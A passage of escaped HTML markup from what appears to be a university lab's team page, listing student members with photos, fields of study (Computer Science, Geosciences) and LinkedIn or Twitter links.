href=\"https://www.linkedin.com/in/akinola-sarah-035789138\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c165-outer\">\n            <div data-colibri-id=\"182-c165\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c165 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c166\" class=\"d-block style-918 style-local-182-c166 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-cropped-cropped-Anvith-e1697208489419.jpg\" class=\"wp-image-1780 style-918-image style-local-182-c166-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-918-frameImage style-local-182-c166-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c167\" class=\"h-global-transition-all h-heading style-914 style-local-182-c167 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-914 style-local-182-c167\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Anvith Anand</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c168\" class=\"h-text h-text-component style-915 style-local-182-c168 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c169\" class=\"style-919 style-local-182-c169 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/anvith-anand\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c170-outer\">\n            <div data-colibri-id=\"182-c170\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c170 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c171\" class=\"d-block style-920 style-local-182-c171 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-cropped-Alex-e1697208598736.jpg\" class=\"wp-image-1782 style-920-image style-local-182-c171-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-920-frameImage style-local-182-c171-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c172\" class=\"h-global-transition-all h-heading style-914 style-local-182-c172 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-914 style-local-182-c172\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Alex Asige</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c173\" class=\"h-text h-text-component style-915 style-local-182-c173 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Geosciences\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c174\" class=\"style-921 style-local-182-c174 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://twitter.com/i/flow/login?redirect_after_login=%2FAsigeAlex\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1347.656 445.313c0 11.719 0 26.367 0 38.086 0 407.227-310.547 875.977-875.977 875.977-172.852 0-336.914-49.805-471.68-137.695 23.438 2.93 49.805 2.93 73.242 2.93 143.555 0 278.32-46.875 383.789-131.836-134.766 0-249.023-90.82-290.039-213.867 20.508 5.859 38.086 5.859 58.594 5.859 29.297 0 55.664-2.93 82.031-8.789-140.625-29.297-246.094-155.273-246.094-301.758 0-2.93 0-2.93 0-5.859 41.016 23.438 87.891 38.086 137.695 38.086-82.031-52.734-137.695-149.414-137.695-254.883 0-55.664 17.578-108.398 43.945-155.273 149.414 187.5 377.93 310.547 632.813 322.266-5.859-23.438-8.789-46.875-8.789-70.313 0-169.922 137.695-307.617 307.617-307.617 90.82 0 169.922 38.086 225.586 96.68 70.313-14.648 137.695-38.086 196.289-73.242-23.438 70.313-73.242 131.836-134.766 169.922 61.523-8.789 120.117-23.438 175.781-49.805-41.016 61.523-93.75 117.188-152.344 161.133z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c175-outer\">\n            <div data-colibri-id=\"182-c175\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c175 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c176\" class=\"d-block style-922 style-local-182-c176 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-cropped-cropped-Bhavya-scaled-1-e1697208670956.jpg\" class=\"wp-image-1784 style-922-image style-local-182-c176-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-922-frameImage style-local-182-c176-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c177\" class=\"h-global-transition-all h-heading style-914 style-local-182-c177 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-914 style-local-182-c177\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Bhavya Busireddy</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c178\" class=\"h-text h-text-component style-915 style-local-182-c178 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p><span style=\"font-weight: 400; font-size: 16px; font-family: Open Sans; color: rgb(64, 85, 169);\">Computer Science</span></p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c179\" class=\"style-923 style-local-182-c179 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/bhavya-busireddy-b052b192/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c180-outer\">\n            <div data-colibri-id=\"182-c180\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c180 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c181\" class=\"d-block style-913 style-local-182-c181 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-cropped-cropped-Vineeth-e1697208720256.jpg\" class=\"wp-image-1786 style-913-image style-local-182-c181-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-913-frameImage style-local-182-c181-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c182\" class=\"h-global-transition-all h-heading style-914 style-local-182-c182 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-914 style-local-182-c182\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Vineeth Kumar Chandha</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c183\" class=\"h-text h-text-component style-915 style-local-182-c183 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c184\" class=\"style-917 style-local-182-c184 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/vineeth-kumar-chandha-207611149/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c185-outer\">\n            <div data-colibri-id=\"182-c185\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c185 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c186\" class=\"d-block style-913 style-local-182-c186 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/04/cropped-cropped-cropped-sathwik-2-scaled-1-e1697208827396.jpg\" class=\"wp-image-1788 style-913-image style-local-182-c186-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-913-frameImage style-local-182-c186-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c187\" class=\"h-global-transition-all h-heading style-914 style-local-182-c187 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-914 style-local-182-c187\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Sathwik Chowda</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c188\" class=\"h-text h-text-component style-915 style-local-182-c188 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p><span style=\"font-weight: 400; font-size: 16px; font-family: Open Sans; color: rgb(64, 85, 169);\">Computer Science</span></p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c189\" class=\"style-917 style-local-182-c189 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/sathwikchowda/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c190-outer\">\n            <div data-colibri-id=\"182-c190\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c190 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c191\" class=\"d-block style-913 style-local-182-c191 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-cropped-cropped-Brindal-e1697208968672.jpeg\" class=\"wp-image-1790 style-913-image style-local-182-c191-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-913-frameImage style-local-182-c191-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c192\" class=\"h-global-transition-all h-heading style-914 style-local-182-c192 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-914 style-local-182-c192\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Brindal Dhol</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c193\" class=\"h-text h-text-component style-915 style-local-182-c193 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c194\" class=\"style-917 style-local-182-c194 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/brindaldhol/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c195-outer\">\n            <div data-colibri-id=\"182-c195\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c195 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c196\" class=\"d-block style-913 style-local-182-c196 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-cropped-cropped-ruby_parcells-scaled-1-2-e1697209095569.jpg\" class=\"wp-image-1792 style-913-image style-local-182-c196-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-913-frameImage style-local-182-c196-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c197\" class=\"h-global-transition-all h-heading style-914 style-local-182-c197 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-914 style-local-182-c197\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Ruby Parcells</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c198\" class=\"h-text h-text-component style-915 style-local-182-c198 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Geosciences\n                      <br>\n                    </p>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c199-outer\">\n            <div data-colibri-id=\"182-c199\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c199 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c200\" class=\"d-block style-913 style-local-182-c200 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-cropped-cropped-Reshmanjali-1-e1697209179440.jpeg\" class=\"wp-image-1794 